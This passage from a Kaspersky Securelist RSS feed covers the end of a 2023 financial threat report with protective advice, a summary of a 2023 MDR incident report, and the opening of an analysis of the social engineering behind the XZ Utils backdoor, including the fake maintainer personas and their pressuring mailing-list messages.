837. </table>
838. <p><em>* Countries and territories with relatively few (under 25,000) Kaspersky mobile security users have been excluded from the rankings.</em><br />
839. <em>** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.</em></p>
840. <h2 id="conclusion">Conclusion</h2>
841. <p>Although the number of users affected by PC banking malware continues to decline, there are other financial threats that underscore the need to stay vigilant and protect your digital assets. Unlike 2022, the year 2023 saw the number of users encountering mobile banking Trojans increase significantly. Cryptocurrency-related phishing and scams continued to grow, too, and they are not expected to stop in the nearest future.</p>
842. <p>To protect your devices and finance-related accounts:</p>
843. <ul>
844. <li>Use secure authentication methods, such as multifactor authentication, strong unique passwords, and so on.</li>
845. <li>Do not follow links from suspicious messages, and do not enter your credentials or payment details, unless you are 200% sure that the website is legitimate.</li>
846. <li>Download apps only form trusted sources, such as official app marketplaces.</li>
847. <li>Use reliable <a href="https://www.kaspersky.com/premium" target="_blank" rel="noopener">security solutions</a> capable of preventing both malware and phishing attacks.</li>
848. </ul>
849. <p>To protect your business:</p>
850. <ul>
851. <li>Regularly update your software and install security patches in a timely manner.</li>
852. <li>Improve your employees&#8217; security awareness, conduct regular security training and encourage safe practices, such as proper account protection.</li>
853. <li>Implement robust monitoring and endpoint security to detect and mitigate threats at an early stage.</li>
854. <li>Implement network segmentation and default deny policies for users with access to financial assets.</li>
855. <li>Stay aware of the latest cybercrime trends by obtaining threat intelligence from trusted sources and sharing it with industry partners.</li>
856. </ul>
857. ]]></content:encoded>
859. <wfw:commentRss>https://securelist.com/financial-threat-report-2023/112526/feed/</wfw:commentRss>
860. <slash:comments>0</slash:comments>
863. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-scaled.jpg" width="2618" height="1527"><media:keywords>full</media:keywords></media:content>
864. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-1024x597.jpg" width="1024" height="597"><media:keywords>large</media:keywords></media:content>
865. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-300x175.jpg" width="300" height="175"><media:keywords>medium</media:keywords></media:content>
866. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
867. </item>
868. <item>
869. <title>Managed Detection and Response in 2023</title>
870. <link>https://securelist.com/kaspersky-mdr-report-2023/112411/</link>
871. <comments>https://securelist.com/kaspersky-mdr-report-2023/112411/#respond</comments>
873. <dc:creator><![CDATA[Kaspersky Security Services]]></dc:creator>
874. <pubDate>Tue, 30 Apr 2024 09:00:40 +0000</pubDate>
875. <category><![CDATA[SOC, TI and IR posts]]></category>
876. <category><![CDATA[Industrial threats]]></category>
877. <category><![CDATA[Internal Threats Statistics]]></category>
878. <category><![CDATA[MDR]]></category>
879. <category><![CDATA[Security services]]></category>
880. <category><![CDATA[Security technology]]></category>
881. <category><![CDATA[Targeted attacks]]></category>
882. <category><![CDATA[Internal threats]]></category>
883. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112411</guid>
884.  
885. <description><![CDATA[The report covers the tactics, techniques and tools most commonly deployed by threat actors, the nature of incidents detected and their distribution among MDR customers.]]></description>
886. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03142303/Kaspersky_MDR_Report_Eng_2023_01.pdf" target="_blank" rel="noopener">Managed Detection and Response in 2023 (PDF)</a></p>
887. <p>Alongside other security solutions, we provide Kaspersky Managed Detection and Response (MDR) to organizations worldwide, delivering expert monitoring and incident response 24/7. The task involves collecting telemetry for analysis by both machine-learning (ML) technologies and our dedicated Security Operations Center (SOC). On detection of a security incident, SOC puts forward a response plan, which, if approved by the customer, is actioned at the endpoint protection level. In addition, our experts give recommendations on organizing incident investigation and response.</p>
888. <p>In the annual MDR report, we present the results of analysis of SOC-detected incidents, supplying answers to the following questions:</p>
889. <ul>
890. <li>Who are your potential attackers?</li>
891. <li>How do they currently operate?</li>
892. <li>How to detect their actions?</li>
893. </ul>
894. <p>The report covers the tactics, techniques and tools most commonly used by threat actors, the nature of high-severity incidents and their distribution among MDR customers by geography and industry.</p>
895. <h2 id="security-incident-statistics-for-2023">Security incident statistics for 2023</h2>
896. <h3 id="security-events">Security events</h3>
897. <p>In 2023, Kaspersky Managed Detection and Response handled more than 431,000 alerts about possible suspicious activity. Of these, more than 117,000 were analyzed by ML technologies, and over 314,000 by SOC analysts. Of the manually processed security events, slightly under 90% turned out to be false positives. What is more, around 32,000 security alerts were linked to approximately 14,000 incidents reported to MDR customers.</p>
898. <h3 id="geographic-distribution-of-users">Geographic distribution of users</h3>
899. <p>In 2023, the largest concentration of Kaspersky MDR customers was in the European region (38%). In second place came Russia and the CIS (28%), in third the Asia-Pacific region (16%).</p>
900. <div id="attachment_112506" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112506" class="size-large wp-image-112506" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1024x508.jpeg" alt="Distribution of Kaspersky MDR customers by region, 2023" width="1024" height="508" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1024x508.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-300x149.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-768x381.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1536x762.jpeg 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-705x350.jpeg 705w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-740x367.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-564x280.jpeg 564w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-800x397.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01.jpeg 1640w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112506" class="wp-caption-text">Distribution of Kaspersky MDR customers by region, 2023</p></div>
901. <h3 id="distribution-of-incidents-by-industry">Distribution of incidents by industry</h3>
902. <p>Since the number of incidents largely depends on the scale of monitoring, the most objective picture is given by the distribution of the ratio of the number of incidents to the number of monitored endpoints. The diagram below shows the expected number of incidents of a given criticality per 10,000 endpoints, broken down by industry.</p>
903. <div id="attachment_112507" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112507" class="size-large wp-image-112507" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-1024x683.jpeg" alt="Expected number of incidents of varying degrees of criticality per 10,000 endpoints in different industries, 2023" width="1024" height="683" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-1024x683.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-300x200.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-768x512.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-525x350.jpeg 525w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-740x494.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-420x280.jpeg 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-800x534.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02.jpeg 1181w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112507" class="wp-caption-text">Expected number of incidents of varying degrees of criticality per 10,000 endpoints in different industries, 2023</p></div>
904. <p>In 2023, the most incidents per 10,000 devices were detected in mass media organizations, development companies and government agencies.</p>
905. <p>In terms of absolute number of incidents detected, the largest number of incidents worldwide in 2023 were recorded in the financial sector (18.3%), industrial enterprises (16.9%) and government agencies (12.5%).</p>
906. <div id="attachment_112508" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112508" class="size-large wp-image-112508" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-1024x524.jpeg" alt="Distribution of the number of Kaspersky MDR customers, all identified incidents and critical incidents by industry, 2023" width="1024" height="524" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-1024x524.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-300x153.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-768x393.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-685x350.jpeg 685w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-740x378.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-548x280.jpeg 548w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-800x409.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03.jpeg 1508w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112508" class="wp-caption-text">Distribution of the number of Kaspersky MDR customers, all identified incidents and critical incidents by industry, 2023</p></div>
907. <h2 id="general-observations-and-recommendations">General observations and recommendations</h2>
908. <p>Based on the analysis of incidents detected in 2023, and on our many years of experience, we can identify the following trends in security incidents and protection measures:</p>
909. <ul>
910. <li>Every year we identify targeted attacks carried out with direct human involvement. To effectively detect such attacks, besides conventional security monitoring, threat hunting is required.</li>
911. <li>The effectiveness of the defense mechanisms deployed by enterprises is best measured by a range of offensive exercises. Year after year, we see rising interest in projects of this kind.</li>
912. <li>In 2023, we identified fewer high-severity malware incidents than in previous years, but the number of incidents of medium and low criticality increased. The most effective approach to guarding against such incidents is through multi-layered protection.</li>
913. <li>Leveraging the MITRE ATT&amp;CK<sup>®</sup> knowledge base supplies additional contextual information for attack detection and investigation teams. Even the most sophisticated attacks consist of simple steps and techniques, with detection of just a single step often uncovering the entire attack.</li>
914. </ul>
915. <p>Detailed information about attacker tactics, techniques and tools, incident detection and response statistics, and defense recommendations can be found in the <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03142303/Kaspersky_MDR_Report_Eng_2023_01.pdf" target="_blank" rel="noopener">full report (PDF)</a>.</p>
916. ]]></content:encoded>
918. <wfw:commentRss>https://securelist.com/kaspersky-mdr-report-2023/112411/feed/</wfw:commentRss>
919. <slash:comments>0</slash:comments>
922. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue.jpg" width="2449" height="1632"><media:keywords>full</media:keywords></media:content>
923. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-1024x682.jpg" width="1024" height="682"><media:keywords>large</media:keywords></media:content>
924. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-300x200.jpg" width="300" height="200"><media:keywords>medium</media:keywords></media:content>
925. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
926. </item>
927. <item>
928. <title>Assessing the Y, and How, of the XZ Utils incident</title>
929. <link>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/</link>
930. <comments>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/#comments</comments>
932. <dc:creator><![CDATA[GReAT]]></dc:creator>
933. <pubDate>Wed, 24 Apr 2024 10:10:31 +0000</pubDate>
934. <category><![CDATA[Incidents]]></category>
935. <category><![CDATA[Linux]]></category>
936. <category><![CDATA[Social engineering]]></category>
937. <category><![CDATA[Supply-chain attack]]></category>
938. <category><![CDATA[Targeted attacks]]></category>
939. <category><![CDATA[XZ]]></category>
940. <category><![CDATA[APT (Targeted attacks)]]></category>
941. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112476</guid>
942.  
943. <description><![CDATA[In this article we analyze social engineering aspects of the XZ backdoor incident. Namely pressuring the XZ maintainer to pass on the project to Jia Cheong Tan, and then urging major downstream maintainers to commit the backdoored code to their projects.]]></description>
944. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>High-end APT groups perform highly interesting social engineering campaigns in order to penetrate well-protected targets. For example, carefully constructed forum responses on precision targeted accounts and follow-up &#8220;out-of-band&#8221; interactions regarding underground rail system simulator software helped deliver <a href="https://securelist.com/unraveling-the-lamberts-toolkit/77990/#green-lambert" target="_blank" rel="noopener">Green Lambert</a> implants in the Middle East. And, in what seems to be a learned approach, the <a href="https://tukaani.org/xz-backdoor/" target="_blank" rel="noopener">XZ Utils project penetration</a> was likely a patient, multi-year approach, both planned in advance but somewhat clumsily executed.</p>
945. <p>This recently exposed offensive effort slowly introduced a small cast of remote characters, communications, and malicious code to the more than decade old open-source project XZ Utils and its maintainer, Lasse Collin. The backdoor code was inserted in February and March 2024, mostly by Jia Cheong Tan, likely a fictitious identity. The end goal was to covertly implement an exclusive use backdoor in sshd by targeting the XZ Utils build process, and push the backdoored code to the major Linux distributions as a part of a large-scale supply chain attack.</p>
946. <p>While this highly targeted and interactive social engineering approach might not be completely novel, it is extraordinary. Also extraordinary is the stunningly subtle insertion of malicious code leveraging the build process in plain sight. This build process focus during a major supply chain attack is comparable only to the CozyDuke/DarkHalo/APT29/NOBELIUM <a href="https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/" target="_blank" rel="noopener">Solarwinds compromise</a> and the <a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" target="_blank" rel="noopener">SUNSPOT</a> implant&#8217;s cunning and persistent presence – its monitoring capability for the execution of a Solarwinds build, and its malicious code insertion during any Solarwinds build execution. Only this time, it&#8217;s human involvement in the build process.</p>
947. <p>It&#8217;s notable that one of the key differentiators of the Solarwinds incident from prior supply chain attacks was the adversary&#8217;s covert, prolonged access to the source/development environment. In this XZ Utils incident, this prolonged access was obtained via social engineering and extended with fictitious human identity interactions in plain sight.</p>
948. <p>One of the best <a href="https://research.swtch.com/xz-timeline" target="_blank" rel="noopener">publicly available chronological timelines</a> on the social engineering side of the XZ Utils incident is posted by Russ Cox, currently a Google researcher. It&#8217;s highly recommended reading. Notably, Cox writes: &#8220;This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021.&#8221;</p>
949. <h2 id="a-singaporean-guy-an-indian-guy-and-a-german-guy-walk-into-a-bar">A Singaporean guy, an Indian guy, and a German guy walk into a bar…</h2>
950. <p>Three identities pressure XZ Utils creator and maintainer Lasse Collin in summer 2022 to provoke an open-source code project handover: Jia Tan/Jia Cheong Tan, Dennis Ens, and Jigar Kumar. These identities are made up of a GitHub account, three free email accounts with similar name schemes, an IRC and Ubuntu One account, email communications on XZ Utils <a href="https://www.mail-archive.com/xz-devel@tukaani.org/" target="_blank" rel="noopener">developer mailing lists</a> and downstream maintainers, and code. Their goal was to grant full access to XZ Utils source code to Jia Tan and subtly introduce malicious code into XZ Utils – the identities even interact with one another on mail threads, complaining about the need to replace Lasse Collin as the XZ Utils maintainer.</p>
951. <p>Note that the geographic dispersion of fictitious identities is a bit forced here, perhaps to dispel hints of coordination: Singaporean or Malaysian (possibly of a Hokkien dialect), northern European, and Indian. Misspellings and grammar mistakes are similar across the three identities&#8217; communications. The &#8220;Jia Tan&#8221; identity seems a bit forced as well – the only public geolocation data is a <a href="https://boehs.org/node/everything-i-know-about-the-xz-backdoor#:~:text=I%20received%20an%20email%20that,and%20activity%20on%20March%2029th.&amp;text=Running%20a%20Nmap%20on%20the,feel%20like%20proximity%20becomes%20plausible." target="_blank" rel="noopener">Singaporean VPN exit node</a> that the identity may have used on March 29 to access the XZ Utils Libera IRC chat. If constructing a fictitious identity, using that particular exit node would definitely be a selected resource.</p>
952. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112478" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png" alt="" width="911" height="337" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png 911w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-300x111.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-768x284.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-740x274.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-757x280.png 757w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-800x296.png 800w" sizes="(max-width: 911px) 100vw, 911px" /></a></p>
953. <p>Our pDNS confirms this IP as a Witopia VPN exit. While we might expect a &#8220;jiat75&#8221; or &#8220;jiatan018&#8221; username for the &#8220;Jia Tan&#8221; Libera IRC account, this one in the screenshot above may have been used on March 29, 2024 by the &#8220;JiaT75&#8221; actor.</p>
954. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112479" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1024x108.png" alt="" width="1024" height="108" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1024x108.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-300x32.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-768x81.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1536x162.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-740x78.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1600x169.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-800x85.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02.png 1647w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
955. <p>One additional identity, Hans Jansen, <a href="https://github.com/tukaani-project/xz/pull/53" target="_blank" rel="noopener">introduced</a> a June 2023 performance optimization into the XZ Utils source, committed by Collin, and later leveraged by jiaT75&#8217;s backdoor code. Jia Tan gleefully accepted the proposed IFUNC additions: &#8220;Thanks for the PR and the helpful links! Overall this seems like a nice improvement to our function-picking strategy for CRC64. It will likely be useful when we implement CRC32 CLMUL too :)&#8221;.</p>
956. <p>This pull request is the Jansen identity&#8217;s only interaction with the XZ Utils project itself. And, unlike the other two identities, the Jansen account is not used to pressure Collin to turn over XZ Utils maintenance. Instead, the Hans Jansen identity provided the code and then disappeared. Nine months later, following the backdoor code insertion, Jansen urged a major Linux vendor in the supply chain to incorporate the backdoored XZ Utils code in their distribution. The identity resurfaced on a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708" target="_blank" rel="noopener">Debian bug report</a> on March 24, 2024, creating an opportunity to generate urgency in including the backdoored code in the Debian distribution.</p>
957. <h2 id="jia-tan-identity-and-activity">Jia Tan Identity and Activity</h2>
958. <p>The Jia Cheong Tan (JiaT75) GitHub account, eventually promoted to co-maintainer of XZ Utils, which inserted the malicious backdoor code, was created January 26, 2021. JiaT75 was not exclusively involved in XZ Utils, having authored over 500 patches to multiple GitHub projects going back to early 2022.</p>
959. <ul>
960. <li>oss-fuzz</li>
961. <li>cpp-docs</li>
962. <li>wasmtime</li>
963. <li>xz</li>
964. </ul>
965. <p>These innocuous patches helped to build the identity of JiaT75 as a legitimate open source contributor and potential maintainer for the XZ Utils project. The patch efforts helped to establish a relationship with Lasse Collin as well.</p>
966. <p>The first JiaT75 code contribution to XZ Utils occurred on October 29, 2021. It was sent to the xz-devel mailing list. It was a very simple editor config file introduction. Following this initial innocuous addition, over the next two years, JiaT75 <a href="https://git.tukaani.org/?p=xz.git;a=search;h=HEAD;pg=4;s=jia+tan;st=author" target="_blank" rel="noopener">authored</a> hundreds of changes for the XZ project.</p>
967. <p>Yes, JiaT75 contributed code on both weekends and what appear to be workdays. However, an interesting anomaly is that the 2024 malicious commits occur out of sync with many previous commits. A Huntress researcher going by the alias &#8220;<a href="https://x.com/birchb0y/status/1773871381890924872" target="_blank" rel="noopener">Alden</a>&#8221; posted a visualization of the malicious Jia Tan commits to XZ Utils. JiaT75 commits the malicious code completely out of sync with prior work times on Feb 23–26, and March 8 and 9, 2024.</p>
968. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03.jpg" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112480" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-1024x683.jpg" alt="" width="1024" height="683" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-1024x683.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-300x200.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-768x512.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-525x350.jpg 525w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-740x493.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-420x280.jpg 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-800x533.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03.jpg 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
969. <p>The time differences for the malicious commits is noticeable. What might this anomaly suggest? We speculate on several possibilities:</p>
970. <ul>
971. <li>the JiaT75 account was used by a second party to insert the malicious code, either known or unknown to the individual contributor.</li>
972. <li>the JiaT75 individual contributor was rushed to commit the malicious backdoor code.</li>
973. <li>the JiaT75 account was run by a team of individuals and one part of the team needed to work without interruption outside of the usual constructed work day.</li>
974. </ul>
975. <p>Especially devious is the manner in which the obfuscated backdoor code is introduced in multiple separate pieces by JiaT75. Even though it was open-source, the bulk of the backdoor does not show up in the XZ source-code tree, is not human readable, and was not recognized.</p>
976. <h2 id="summer-2022-pressure-to-add-a-maintainer">Summer 2022 Pressure to Add a Maintainer</h2>
977. <p>Multiple identities of interest pressured Lasse Collin to add a maintainer over the summer of 2022. The intensity of pressure on Collin varies per account, but they all create opportunities to pressure Collin and interact.</p>
978. <table width="100%">
979. <tbody>
980. <tr>
981. <td width="22%"><strong>Name</strong></td>
982. <td width="22%"><strong>GitHub Account</strong></td>
983. <td width="34%"><strong>Email</strong></td>
984. <td width="22%"><strong>Creation</strong></td>
985. </tr>
986. <tr>
987. <td>Jia Tan/Jia Cheong Tan</td>
988. <td>JiaT75</td>
989. <td>jiat0218@gmail.com</td>
990. <td>January 26, 2021</td>
991. </tr>
992. <tr>
993. <td>Dennis Ens</td>
994. <td>&#8211;</td>
995. <td>dennis3ns@gmail.com</td>
996. <td>&#8211;</td>
997. </tr>
998. <tr>
999. <td>Jigar Kumar</td>
1000. <td>&#8211;</td>
1001. <td>jigarkumar17@protonmail.com</td>
1002. <td>&#8211;</td>
1003. </tr>
1004. </tbody>
1005. </table>
1006. <p>If we take the first interaction on the xz-devel mailing list as the start of the campaign, Jia Tan sent a <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00512.html" target="_blank" rel="noopener">superficial code patch</a> on September 29, 2021. This timestamp is eight months after the github account creation date. This initial contribution is harmless, but establishes this identity within the open-source project.</p>
1007. <p>A year later, Jigar Kumar pressured Lasse Collin to hand over access to Jia Tan over the spring and summer of 2022 in six chiding comments over two different threads.</p>
1008. <table width="100%">
1009. <tbody>
1010. <tr>
1011. <td width="40%">Wed, 27 Apr 2022 11:42:57 -0700</td>
1012. <td width="60%"><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00555.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
1013. </tr>
1014. <tr>
1015. <td colspan="2">Your efforts are good but based on the slow release schedule it will unfortunatly be years until the community actually gets this quality of life feature.</td>
1016. </tr>
1017. <tr>
1018. <td>Thu, 28 Apr 2022 10:10:48 -0700</td>
1019. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00557.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
1020. </tr>
1021. <tr>
1022. <td colspan="2">Patches spend years on this mailing list. 5.2.0 release was 7 years ago. There<br />
1023. is no reason to think anything is coming soon.</td>
1024. </tr>
1025. <tr>
1026. <td>Fri, 27 May 2022 10:49:47 -0700</td>
1027. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00565.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
1028. </tr>
1029. <tr>
1030. <td colspan="2">Over 1 month and no closer to being merged. Not a suprise.</td>
1031. </tr>
1032. <tr>
1033. <td>Tue, 07 Jun 2022 09:00:18 -0700</td>
1034. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00566.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
1035. </tr>
1036. <tr>
1037. <td colspan="2">Progress will not happen until there is new maintainer. XZ for C has sparse<br />
1038. commit log too. Dennis you are better off waiting until new maintainer happens<br />
1039. or fork yourself. Submitting patches here has no purpose these days. The<br />
1040. current maintainer lost interest or doesn&#8217;t care to maintain anymore. It is sad<br />
1041. to see for a repo like this.</td>
1042. </tr>
1043. <tr>
1044. <td>Tue, 14 Jun 2022 11:16:07 -0700</td>
1045. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
1046. </tr>
1047. <tr>
1048. <td colspan="2">With your current rate, I very doubt to see 5.4.0 release this year. The only<br />
1049. progress since april has been small changes to test code. You ignore the many<br />
